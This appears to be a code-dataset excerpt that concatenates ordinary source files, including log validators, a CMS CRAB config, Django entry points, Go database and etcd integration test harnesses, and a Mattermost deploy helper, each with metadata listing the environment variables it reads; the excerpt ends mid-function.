def validate_alb_log(key):
regex = re.compile('\d+_\w+_\w{2}-\w{4,9}-[12]_.*._\d{8}T\d{4}Z_\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}_.*.log.gz$', re.I)
match = regex.search(key)
return bool(match)
def validate_cf_log(key):
regex = re.compile('\w+\.\d{4}-\d{2}-\d{2}-\d{2}\.\w+\.gz$', re.I)
match = regex.search(key)
return bool(match)
def validate_ct_log(key):
regex = re.compile('\d+_CloudTrail_\w{2}-\w{4,9}-[12]_\d{8}T\d{4}Z.+.json.gz$', re.I)
match = regex.search(key)
return bool(match)
def mask_parsed(parsed, mask=[]):
for key in mask: parsed[key] = '-'
for key in list(parsed):
try:
try:
assert float(parsed[key])
except AssertionError:
parsed[key] = '0'
except ValueError:
pass
return parsed
| [] | [] | [
"region",
"salt",
"token"
] | [] | ["region", "salt", "token"] | python | 3 | 0 | |
Kai/crab/NANOv7_NoveCampaign/2017/crab_cfg_2017_tt_SL-HDAMPdown.py | import os
from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromCRIC
config = Configuration()
config.section_("General")
config.General.requestName = '2017_tt_SL-HDAMPdown'
config.General.transferOutputs = True
config.General.transferLogs = True
config.section_("JobType")
config.JobType.allowUndistributedCMSSW = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'crab_PSet_2017_tt_SL-HDAMPdown.py'
config.JobType.maxMemoryMB = 3000
config.JobType.maxJobRuntimeMin = 1800
config.JobType.numCores = 1
config.JobType.scriptExe = 'crab_script_2017_tt_SL-HDAMPdown.sh'
config.JobType.inputFiles = ['crab_script_2017_tt_SL-HDAMPdown.py',
os.path.join(os.environ['CMSSW_BASE'],'src/PhysicsTools/NanoAODTools/scripts/haddnano.py'),
]
config.JobType.outputFiles = [] #['hist.root']
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/TTToSemiLeptonic_hdampDOWN_TuneCP5_PSweights_13TeV-powheg-pythia8/RunIIFall17NanoAODv7-PU2017_12Apr2018_Nano02Apr2020_102X_mc2017_realistic_v8-v1/NANOAODSIM'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
if config.Data.splitting == 'FileBased':
config.Data.unitsPerJob = 1
# config.Data.totalUnits = $TOTAL_UNITS
# config.Data.userInputFiles = []
# config.Data.outLFNDirBase = '/store/user/{}/NoveCampaign/{}'.format(getUsernameFromCRIC(), "2017")
config.Data.outLFNDirBase = '/store/group/fourtop/NoveCampaign/{}'.format("2017")
config.Data.publication = True
config.Data.outputDatasetTag = 'NoveCampaign'
config.section_("Site")
config.Site.storageSite = 'T2_BE_IIHE'
| [] | [] | [
"CMSSW_BASE"
] | [] | ["CMSSW_BASE"] | python | 1 | 0 | |
tests/test_helper.py | # -*- coding: utf-8 -*-
"""Define general test helper attributes and utilities."""
import os
import sys
TRAVIS=os.getenv("TRAVIS_PYTHON_VERSION") is not None
PYTHON_VERSION = "%s.%s" % (sys.version_info.major, sys.version_info.minor)
TMP_DIR="/tmp"
| [] | [] | [
"TRAVIS_PYTHON_VERSION"
] | [] | ["TRAVIS_PYTHON_VERSION"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cdrc_cms.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
config/backend_sql_test.go | // Copyright © 2017 Aeneas Rekkas <[email protected]>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package config
import (
"flag"
"fmt"
"log"
"net/url"
"os"
"strings"
"testing"
"time"
_ "github.com/go-sql-driver/mysql"
"github.com/jmoiron/sqlx"
_ "github.com/lib/pq"
"github.com/ory/dockertest"
"github.com/sirupsen/logrus"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
var (
mysql *url.URL
postgres *url.URL
)
var resources []*dockertest.Resource
func TestMain(m *testing.M) {
flag.Parse()
if !testing.Short() {
mysql = bootstrapMySQL()
postgres = bootstrapPostgres()
}
s := m.Run()
killAll()
os.Exit(s)
}
func merge(u *url.URL, params map[string]string) *url.URL {
b := new(url.URL)
*b = *u
for k, v := range params {
b.Query().Add(k, v)
}
return b
}
func TestCleanQueryURL(t *testing.T) {
a, _ := url.Parse("mysql://foo:bar@baz/db?max_conn_lifetime=1h&max_idle_conns=10&max_conns=10")
b := cleanURLQuery(a)
assert.NotEqual(t, a, b)
assert.NotEqual(t, a.String(), b.String())
assert.Equal(t, true, strings.Contains(a.String(), "max_conn_lifetime"))
assert.Equal(t, false, strings.Contains(b.String(), "max_conn_lifetime"))
}
func TestSQLConnection(t *testing.T) {
if testing.Short() {
t.Skip("Skipping test in short mode.")
return
}
for _, tc := range []struct {
s *SQLConnection
d string
}{
{
d: "mysql raw",
s: &SQLConnection{
URL: mysql,
},
},
{
d: "mysql max_conn_lifetime",
s: &SQLConnection{
URL: merge(mysql, map[string]string{"max_conn_lifetime": "1h"}),
},
},
{
d: "mysql max_conn_lifetime",
s: &SQLConnection{
URL: merge(mysql, map[string]string{"max_conn_lifetime": "1h", "max_idle_conns": "10", "max_conns": "10"}),
},
},
{
d: "pg raw",
s: &SQLConnection{
URL: postgres,
},
},
{
d: "pg max_conn_lifetime",
s: &SQLConnection{
URL: merge(postgres, map[string]string{"max_conn_lifetime": "1h"}),
},
},
{
d: "pg max_conn_lifetime",
s: &SQLConnection{
URL: merge(postgres, map[string]string{"max_conn_lifetime": "1h", "max_idle_conns": "10", "max_conns": "10"}),
},
},
} {
t.Run(fmt.Sprintf("case=%s", tc.d), func(t *testing.T) {
tc.s.L = logrus.New()
db := tc.s.GetDatabase()
require.Nil(t, db.Ping())
})
}
}
func killAll() {
pool, err := dockertest.NewPool("")
if err != nil {
log.Fatalf("Could not Connect to pool because %s", err)
}
for _, resource := range resources {
if err := pool.Purge(resource); err != nil {
log.Printf("Got an error while trying to purge resource: %s", err)
}
}
resources = []*dockertest.Resource{}
}
func bootstrapMySQL() *url.URL {
if uu := os.Getenv("TEST_DATABASE_MYSQL"); uu != "" {
log.Println("Found mysql test database config, skipping dockertest...")
_, err := sqlx.Open("postgres", uu)
if err != nil {
log.Fatalf("Could not connect to bootstrapped database: %s", err)
}
u, _ := url.Parse("mysql://" + uu)
return u
}
var db *sqlx.DB
var err error
var urls string
pool, err := dockertest.NewPool("")
pool.MaxWait = time.Minute * 5
if err != nil {
log.Fatalf("Could not Connect to docker: %s", err)
}
resource, err := pool.Run("mysql", "5.7", []string{"MYSQL_ROOT_PASSWORD=secret"})
if err != nil {
log.Fatalf("Could not start resource: %s", err)
}
if err = pool.Retry(func() error {
var err error
urls = fmt.Sprintf("root:secret@(localhost:%s)/mysql?parseTime=true", resource.GetPort("3306/tcp"))
db, err = sqlx.Open("mysql", urls)
if err != nil {
return err
}
return db.Ping()
}); err != nil {
pool.Purge(resource)
log.Fatalf("Could not Connect to docker: %s", err)
}
resources = append(resources, resource)
u, _ := url.Parse("mysql://" + urls)
return u
}
func bootstrapPostgres() *url.URL {
if uu := os.Getenv("TEST_DATABASE_POSTGRESQL"); uu != "" {
log.Println("Found postgresql test database config, skipping dockertest...")
_, err := sqlx.Open("postgres", uu)
if err != nil {
log.Fatalf("Could not connect to bootstrapped database: %s", err)
}
u, _ := url.Parse(uu)
return u
}
var db *sqlx.DB
var err error
var urls string
pool, err := dockertest.NewPool("")
if err != nil {
log.Fatalf("Could not Connect to docker: %s", err)
}
resource, err := pool.Run("postgres", "9.6", []string{"POSTGRES_PASSWORD=secret", "POSTGRES_DB=hydra"})
if err != nil {
log.Fatalf("Could not start resource: %s", err)
}
if err = pool.Retry(func() error {
var err error
urls = fmt.Sprintf("postgres://postgres:secret@localhost:%s/hydra?sslmode=disable", resource.GetPort("5432/tcp"))
db, err = sqlx.Open("postgres", urls)
if err != nil {
return err
}
return db.Ping()
}); err != nil {
pool.Purge(resource)
log.Fatalf("Could not Connect to docker: %s", err)
}
resources = append(resources, resource)
u, _ := url.Parse(urls)
return u
}
| [
"\"TEST_DATABASE_MYSQL\"",
"\"TEST_DATABASE_POSTGRESQL\""
] | [] | [
"TEST_DATABASE_POSTGRESQL",
"TEST_DATABASE_MYSQL"
] | [] | ["TEST_DATABASE_POSTGRESQL", "TEST_DATABASE_MYSQL"] | go | 2 | 0 | |
staging/src/k8s.io/sample-apiserver/main.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"flag"
"os"
"runtime"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/apiserver/pkg/util/logs"
"k8s.io/sample-apiserver/pkg/cmd/server"
)
func main() {
logs.InitLogs()
defer logs.FlushLogs()
if len(os.Getenv("GOMAXPROCS")) == 0 {
runtime.GOMAXPROCS(runtime.NumCPU())
}
cmd := server.NewCommandStartWardleServer(os.Stdout, os.Stderr, wait.NeverStop)
cmd.Flags().AddGoFlagSet(flag.CommandLine)
if err := cmd.Execute(); err != nil {
panic(err)
}
}
| [
"\"GOMAXPROCS\""
] | [] | [
"GOMAXPROCS"
] | [] | ["GOMAXPROCS"] | go | 1 | 0 | |
cmd/appsctl/mattermost.go | // main handles deployment of the plugin to a development server using the Client4 API.
package main
import (
"os"
"github.com/pkg/errors"
"github.com/mattermost/mattermost-plugin-apps/apps"
"github.com/mattermost/mattermost-plugin-apps/apps/appclient"
)
func getMattermostClient() (*appclient.Client, error) {
siteURL := os.Getenv("MM_SERVICESETTINGS_SITEURL")
adminToken := os.Getenv("MM_ADMIN_TOKEN")
if siteURL == "" || adminToken == "" {
return nil, errors.New("MM_SERVICESETTINGS_SITEURL and MM_ADMIN_TOKEN must be set")
}
return appclient.NewClient("", adminToken, siteURL), nil
}
func updateMattermost(m apps.Manifest, deployType apps.DeployType, installApp bool) error {
appClient, err := getMattermostClient()
if err != nil {
return err
}
allListed, _, err := appClient.GetListedApps("", true)
if err != nil {
return errors.Wrap(err, "failed to get current listed apps from Mattermost")
}
d := apps.Deploy{}
for _, listed := range allListed {
if listed.Manifest.AppID == m.AppID {
d = listed.Manifest.Deploy
}
}
// Keep the Deploy part of the stored manifest intact, just add/update the
// new deploy type.
m.Deploy = d.UpdateDeploy(m.Deploy, deployType)
_, err = appClient.StoreListedApp(m)
if err != nil {
return errors.Wrap(err, "failed to add local manifest to Mattermost")
}
log.Debugw("Updated local manifest", "app_id", m.AppID, "deploy_type", deployType)
if installApp {
_, err = appClient.InstallApp(m.AppID, deployType)
if err != nil {
return errors.Wrap(err, "failed to install the app to Mattermost")
}
log.Debugw("Installed app to Mattermost", "app_id", m.AppID)
}
return nil
}
| [
"\"MM_SERVICESETTINGS_SITEURL\"",
"\"MM_ADMIN_TOKEN\""
] | [] | [
"MM_SERVICESETTINGS_SITEURL",
"MM_ADMIN_TOKEN"
] | [] | ["MM_SERVICESETTINGS_SITEURL", "MM_ADMIN_TOKEN"] | go | 2 | 0 | |
unesp/wsgi.py | """
WSGI config for unesp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "unesp.settings")
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
src/sdk/pynni/nni/common.py | # Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ==================================================================================================
from collections import namedtuple
from datetime import datetime
from io import TextIOBase
import logging
import os
import sys
def _load_env_args():
args = {
'platform': os.environ.get('NNI_PLATFORM'),
'trial_job_id': os.environ.get('NNI_TRIAL_JOB_ID'),
'log_dir': os.environ.get('NNI_LOG_DIRECTORY'),
'role': os.environ.get('NNI_ROLE'),
}
return namedtuple('EnvArgs', args.keys())(**args)
env_args = _load_env_args()
'''Arguments passed from environment'''
_time_format = '%Y-%m-%d %H:%M:%S'
class _LoggerFileWrapper(TextIOBase):
def __init__(self, logger_file):
self.file = logger_file
def write(self, s):
if s != '\n':
time = datetime.now().strftime(_time_format)
self.file.write('[{}] PRINT '.format(time) + s + '\n')
self.file.flush()
return len(s)
def init_logger(logger_file_path):
"""Initialize root logger.
This will redirect anything from logging.getLogger() as well as stdout to specified file.
logger_file_path: path of logger file (path-like object).
"""
if env_args.platform == 'unittest':
logger_file_path = 'unittest.log'
elif env_args.log_dir is not None:
logger_file_path = os.path.join(env_args.log_dir, logger_file_path)
logger_file = open(logger_file_path, 'w')
fmt = '[%(asctime)s] %(levelname)s (%(name)s) %(message)s'
formatter = logging.Formatter(fmt, _time_format)
handler = logging.StreamHandler(logger_file)
handler.setFormatter(formatter)
root_logger = logging.getLogger()
root_logger.addHandler(handler)
root_logger.setLevel(logging.DEBUG)
# these modules are too verbose
logging.getLogger('matplotlib').setLevel(logging.INFO)
sys.stdout = _LoggerFileWrapper(logger_file)
| [] | [] | [
"NNI_TRIAL_JOB_ID",
"NNI_PLATFORM",
"NNI_LOG_DIRECTORY",
"NNI_ROLE"
] | [] | ["NNI_TRIAL_JOB_ID", "NNI_PLATFORM", "NNI_LOG_DIRECTORY", "NNI_ROLE"] | python | 4 | 0 | |
tests/framework/integration/cluster.go | // Copyright 2016 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package integration
import (
"context"
"crypto/tls"
"fmt"
"io"
"log"
"math/rand"
"net"
"net/http"
"net/http/httptest"
"os"
"reflect"
"sort"
"strings"
"sync"
"sync/atomic"
"time"
pb "go.etcd.io/etcd/api/v3/etcdserverpb"
"go.etcd.io/etcd/client/pkg/v3/testutil"
"go.etcd.io/etcd/client/pkg/v3/tlsutil"
"go.etcd.io/etcd/client/pkg/v3/transport"
"go.etcd.io/etcd/client/pkg/v3/types"
"go.etcd.io/etcd/client/v2"
"go.etcd.io/etcd/client/v3"
"go.etcd.io/etcd/pkg/v3/grpc_testing"
"go.etcd.io/etcd/raft/v3"
"go.etcd.io/etcd/server/v3/config"
"go.etcd.io/etcd/server/v3/embed"
"go.etcd.io/etcd/server/v3/etcdserver"
"go.etcd.io/etcd/server/v3/etcdserver/api/etcdhttp"
"go.etcd.io/etcd/server/v3/etcdserver/api/membership"
"go.etcd.io/etcd/server/v3/etcdserver/api/rafthttp"
"go.etcd.io/etcd/server/v3/etcdserver/api/v2http"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3client"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3election"
epb "go.etcd.io/etcd/server/v3/etcdserver/api/v3election/v3electionpb"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3lock"
lockpb "go.etcd.io/etcd/server/v3/etcdserver/api/v3lock/v3lockpb"
"go.etcd.io/etcd/server/v3/etcdserver/api/v3rpc"
"go.etcd.io/etcd/server/v3/verify"
"go.uber.org/zap/zapcore"
"go.uber.org/zap/zaptest"
"github.com/soheilhy/cmux"
"go.uber.org/zap"
"golang.org/x/crypto/bcrypt"
"google.golang.org/grpc"
"google.golang.org/grpc/keepalive"
)
const (
// RequestWaitTimeout is the time duration to wait for a request to go through or detect leader loss.
RequestWaitTimeout = 5 * time.Second
TickDuration = 10 * time.Millisecond
RequestTimeout = 20 * time.Second
ClusterName = "etcd"
BasePort = 21000
URLScheme = "unix"
URLSchemeTLS = "unixs"
BaseGRPCPort = 30000
)
var (
ElectionTicks = 10
// LocalListenCount integration test uses unique ports, counting up, to listen for each
// member, ensuring restarted members can listen on the same port again.
LocalListenCount = int32(0)
TestTLSInfo = transport.TLSInfo{
KeyFile: MustAbsPath("../fixtures/server.key.insecure"),
CertFile: MustAbsPath("../fixtures/server.crt"),
TrustedCAFile: MustAbsPath("../fixtures/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoWithSpecificUsage = transport.TLSInfo{
KeyFile: MustAbsPath("../fixtures/server-serverusage.key.insecure"),
CertFile: MustAbsPath("../fixtures/server-serverusage.crt"),
ClientKeyFile: MustAbsPath("../fixtures/client-clientusage.key.insecure"),
ClientCertFile: MustAbsPath("../fixtures/client-clientusage.crt"),
TrustedCAFile: MustAbsPath("../fixtures/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoIP = transport.TLSInfo{
KeyFile: MustAbsPath("../fixtures/server-ip.key.insecure"),
CertFile: MustAbsPath("../fixtures/server-ip.crt"),
TrustedCAFile: MustAbsPath("../fixtures/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoExpired = transport.TLSInfo{
KeyFile: MustAbsPath("./fixtures-expired/server.key.insecure"),
CertFile: MustAbsPath("./fixtures-expired/server.crt"),
TrustedCAFile: MustAbsPath("./fixtures-expired/ca.crt"),
ClientCertAuth: true,
}
TestTLSInfoExpiredIP = transport.TLSInfo{
KeyFile: MustAbsPath("./fixtures-expired/server-ip.key.insecure"),
CertFile: MustAbsPath("./fixtures-expired/server-ip.crt"),
TrustedCAFile: MustAbsPath("./fixtures-expired/ca.crt"),
ClientCertAuth: true,
}
DefaultTokenJWT = fmt.Sprintf("jwt,pub-key=%s,priv-key=%s,sign-method=RS256,ttl=1s",
MustAbsPath("../fixtures/server.crt"), MustAbsPath("../fixtures/server.key.insecure"))
// UniqueNumber is used to generate unique port numbers
// Should only be accessed via atomic package methods.
UniqueNumber int32
)
type ClusterConfig struct {
Size int
PeerTLS *transport.TLSInfo
ClientTLS *transport.TLSInfo
DiscoveryURL string
AuthToken string
QuotaBackendBytes int64
MaxTxnOps uint
MaxRequestBytes uint
SnapshotCount uint64
SnapshotCatchUpEntries uint64
GRPCKeepAliveMinTime time.Duration
GRPCKeepAliveInterval time.Duration
GRPCKeepAliveTimeout time.Duration
ClientMaxCallSendMsgSize int
ClientMaxCallRecvMsgSize int
// UseIP is true to use only IP for gRPC requests.
UseIP bool
// UseBridge adds bridge between client and grpc server. Should be used in tests that
// want to manipulate connection or require connection not breaking despite server stop/restart.
UseBridge bool
// UseTCP configures server listen on tcp socket. If disabled unix socket is used.
UseTCP bool
EnableLeaseCheckpoint bool
LeaseCheckpointInterval time.Duration
LeaseCheckpointPersist bool
WatchProgressNotifyInterval time.Duration
ExperimentalMaxLearners int
StrictReconfigCheck bool
}
type Cluster struct {
Cfg *ClusterConfig
Members []*Member
LastMemberNum int
mu sync.Mutex
clusterClient *clientv3.Client
}
func SchemeFromTLSInfo(tls *transport.TLSInfo) string {
if tls == nil {
return URLScheme
}
return URLSchemeTLS
}
func (c *Cluster) fillClusterForMembers() error {
if c.Cfg.DiscoveryURL != "" {
// Cluster will be discovered
return nil
}
addrs := make([]string, 0)
for _, m := range c.Members {
scheme := SchemeFromTLSInfo(m.PeerTLSInfo)
for _, l := range m.PeerListeners {
addrs = append(addrs, fmt.Sprintf("%s=%s://%s", m.Name, scheme, l.Addr().String()))
}
}
clusterStr := strings.Join(addrs, ",")
var err error
for _, m := range c.Members {
m.InitialPeerURLsMap, err = types.NewURLsMap(clusterStr)
if err != nil {
return err
}
}
return nil
}
func (c *Cluster) Launch(t testutil.TB) {
errc := make(chan error)
for _, m := range c.Members {
// Members are launched in separate goroutines because if they boot
// using discovery url, they have to wait for others to register to continue.
go func(m *Member) {
errc <- m.Launch()
}(m)
}
for range c.Members {
if err := <-errc; err != nil {
c.Terminate(t)
t.Fatalf("error setting up member: %v", err)
}
}
// wait Cluster to be stable to receive future client requests
c.WaitMembersMatch(t, c.HTTPMembers())
c.waitVersion()
for _, m := range c.Members {
t.Logf(" - %v -> %v (%v)", m.Name, m.ID(), m.GRPCURL())
}
}
func (c *Cluster) URL(i int) string {
return c.Members[i].ClientURLs[0].String()
}
// URLs returns a list of all active client URLs in the Cluster
func (c *Cluster) URLs() []string {
return getMembersURLs(c.Members)
}
func getMembersURLs(members []*Member) []string {
urls := make([]string, 0)
for _, m := range members {
select {
case <-m.Server.StopNotify():
continue
default:
}
for _, u := range m.ClientURLs {
urls = append(urls, u.String())
}
}
return urls
}
// HTTPMembers returns a list of all active members as client.Members
func (c *Cluster) HTTPMembers() []client.Member {
ms := []client.Member{}
for _, m := range c.Members {
pScheme := SchemeFromTLSInfo(m.PeerTLSInfo)
cScheme := SchemeFromTLSInfo(m.ClientTLSInfo)
cm := client.Member{Name: m.Name}
for _, ln := range m.PeerListeners {
cm.PeerURLs = append(cm.PeerURLs, pScheme+"://"+ln.Addr().String())
}
for _, ln := range m.ClientListeners {
cm.ClientURLs = append(cm.ClientURLs, cScheme+"://"+ln.Addr().String())
}
ms = append(ms, cm)
}
return ms
}
func (c *Cluster) mustNewMember(t testutil.TB) *Member {
memberNumber := c.LastMemberNum
c.LastMemberNum++
m := MustNewMember(t,
MemberConfig{
Name: fmt.Sprintf("m%v", memberNumber-1),
MemberNumber: memberNumber,
AuthToken: c.Cfg.AuthToken,
PeerTLS: c.Cfg.PeerTLS,
ClientTLS: c.Cfg.ClientTLS,
QuotaBackendBytes: c.Cfg.QuotaBackendBytes,
MaxTxnOps: c.Cfg.MaxTxnOps,
MaxRequestBytes: c.Cfg.MaxRequestBytes,
SnapshotCount: c.Cfg.SnapshotCount,
SnapshotCatchUpEntries: c.Cfg.SnapshotCatchUpEntries,
GrpcKeepAliveMinTime: c.Cfg.GRPCKeepAliveMinTime,
GrpcKeepAliveInterval: c.Cfg.GRPCKeepAliveInterval,
GrpcKeepAliveTimeout: c.Cfg.GRPCKeepAliveTimeout,
ClientMaxCallSendMsgSize: c.Cfg.ClientMaxCallSendMsgSize,
ClientMaxCallRecvMsgSize: c.Cfg.ClientMaxCallRecvMsgSize,
UseIP: c.Cfg.UseIP,
UseBridge: c.Cfg.UseBridge,
UseTCP: c.Cfg.UseTCP,
EnableLeaseCheckpoint: c.Cfg.EnableLeaseCheckpoint,
LeaseCheckpointInterval: c.Cfg.LeaseCheckpointInterval,
LeaseCheckpointPersist: c.Cfg.LeaseCheckpointPersist,
WatchProgressNotifyInterval: c.Cfg.WatchProgressNotifyInterval,
ExperimentalMaxLearners: c.Cfg.ExperimentalMaxLearners,
StrictReconfigCheck: c.Cfg.StrictReconfigCheck,
})
m.DiscoveryURL = c.Cfg.DiscoveryURL
return m
}
// addMember return PeerURLs of the added member.
func (c *Cluster) addMember(t testutil.TB) types.URLs {
m := c.mustNewMember(t)
scheme := SchemeFromTLSInfo(c.Cfg.PeerTLS)
// send add request to the Cluster
var err error
for i := 0; i < len(c.Members); i++ {
clientURL := c.URL(i)
peerURL := scheme + "://" + m.PeerListeners[0].Addr().String()
if err = c.AddMemberByURL(t, clientURL, peerURL); err == nil {
break
}
}
if err != nil {
t.Fatalf("add member failed on all members error: %v", err)
}
m.InitialPeerURLsMap = types.URLsMap{}
for _, mm := range c.Members {
m.InitialPeerURLsMap[mm.Name] = mm.PeerURLs
}
m.InitialPeerURLsMap[m.Name] = m.PeerURLs
m.NewCluster = false
if err := m.Launch(); err != nil {
t.Fatal(err)
}
c.Members = append(c.Members, m)
// wait Cluster to be stable to receive future client requests
c.WaitMembersMatch(t, c.HTTPMembers())
return m.PeerURLs
}
func (c *Cluster) AddMemberByURL(t testutil.TB, clientURL, peerURL string) error {
cc := MustNewHTTPClient(t, []string{clientURL}, c.Cfg.ClientTLS)
ma := client.NewMembersAPI(cc)
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
_, err := ma.Add(ctx, peerURL)
cancel()
if err != nil {
return err
}
// wait for the add node entry applied in the Cluster
members := append(c.HTTPMembers(), client.Member{PeerURLs: []string{peerURL}, ClientURLs: []string{}})
c.WaitMembersMatch(t, members)
return nil
}
// AddMember return PeerURLs of the added member.
func (c *Cluster) AddMember(t testutil.TB) types.URLs {
return c.addMember(t)
}
func (c *Cluster) MustRemoveMember(t testutil.TB, id uint64) {
if err := c.RemoveMember(t, id); err != nil {
t.Fatal(err)
}
}
func (c *Cluster) RemoveMember(t testutil.TB, id uint64) error {
// send remove request to the Cluster
cc := MustNewHTTPClient(t, c.URLs(), c.Cfg.ClientTLS)
ma := client.NewMembersAPI(cc)
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
err := ma.Remove(ctx, types.ID(id).String())
cancel()
if err != nil {
return err
}
newMembers := make([]*Member, 0)
for _, m := range c.Members {
if uint64(m.Server.ID()) != id {
newMembers = append(newMembers, m)
} else {
m.Client.Close()
select {
case <-m.Server.StopNotify():
m.Terminate(t)
// 1s stop delay + election timeout + 1s disk and network delay + connection write timeout
// TODO: remove connection write timeout by selecting on http response closeNotifier
// blocking on https://github.com/golang/go/issues/9524
case <-time.After(time.Second + time.Duration(ElectionTicks)*TickDuration + time.Second + rafthttp.ConnWriteTimeout):
t.Fatalf("failed to remove member %s in time", m.Server.ID())
}
}
}
c.Members = newMembers
c.WaitMembersMatch(t, c.HTTPMembers())
return nil
}
func (c *Cluster) WaitMembersMatch(t testutil.TB, membs []client.Member) {
for _, u := range c.URLs() {
cc := MustNewHTTPClient(t, []string{u}, c.Cfg.ClientTLS)
ma := client.NewMembersAPI(cc)
for {
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
ms, err := ma.List(ctx)
cancel()
if err == nil && isMembersEqual(ms, membs) {
break
}
time.Sleep(TickDuration)
}
}
}
// WaitLeader returns index of the member in c.Members that is leader (or -1).
func (c *Cluster) WaitLeader(t testutil.TB) int { return c.WaitMembersForLeader(t, c.Members) }
// WaitMembersForLeader waits until given members agree on the same leader,
// and returns its 'index' in the 'membs' list (or -1).
func (c *Cluster) WaitMembersForLeader(t testutil.TB, membs []*Member) int {
possibleLead := make(map[uint64]bool)
var lead uint64
for _, m := range membs {
possibleLead[uint64(m.Server.ID())] = true
}
cc := MustNewHTTPClient(t, getMembersURLs(membs), nil)
kapi := client.NewKeysAPI(cc)
// ensure leader is up via linearizable get
for {
ctx, cancel := context.WithTimeout(context.Background(), 10*TickDuration+time.Second)
_, err := kapi.Get(ctx, "0", &client.GetOptions{Quorum: true})
cancel()
if err == nil || strings.Contains(err.Error(), "Key not found") {
break
}
}
for lead == 0 || !possibleLead[lead] {
lead = 0
for _, m := range membs {
select {
case <-m.Server.StopNotify():
continue
default:
}
if lead != 0 && lead != m.Server.Lead() {
lead = 0
time.Sleep(10 * TickDuration)
break
}
lead = m.Server.Lead()
}
}
for i, m := range membs {
if uint64(m.Server.ID()) == lead {
return i
}
}
return -1
}
func (c *Cluster) WaitNoLeader() { c.WaitMembersNoLeader(c.Members) }
// WaitMembersNoLeader waits until given members lose leader.
func (c *Cluster) WaitMembersNoLeader(membs []*Member) {
noLeader := false
for !noLeader {
noLeader = true
for _, m := range membs {
select {
case <-m.Server.StopNotify():
continue
default:
}
if m.Server.Lead() != 0 {
noLeader = false
time.Sleep(10 * TickDuration)
break
}
}
}
}
func (c *Cluster) waitVersion() {
for _, m := range c.Members {
for {
if m.Server.ClusterVersion() != nil {
break
}
time.Sleep(TickDuration)
}
}
}
// isMembersEqual checks whether two members equal except ID field.
// The given wmembs should always set ID field to empty string.
func isMembersEqual(membs []client.Member, wmembs []client.Member) bool {
sort.Sort(SortableMemberSliceByPeerURLs(membs))
sort.Sort(SortableMemberSliceByPeerURLs(wmembs))
for i := range membs {
membs[i].ID = ""
}
return reflect.DeepEqual(membs, wmembs)
}
func newLocalListener(t testutil.TB) net.Listener {
c := atomic.AddInt32(&LocalListenCount, 1)
// Go 1.8+ allows only numbers in port
addr := fmt.Sprintf("127.0.0.1:%05d%05d", c+BasePort, os.Getpid())
return NewListenerWithAddr(t, addr)
}
func NewListenerWithAddr(t testutil.TB, addr string) net.Listener {
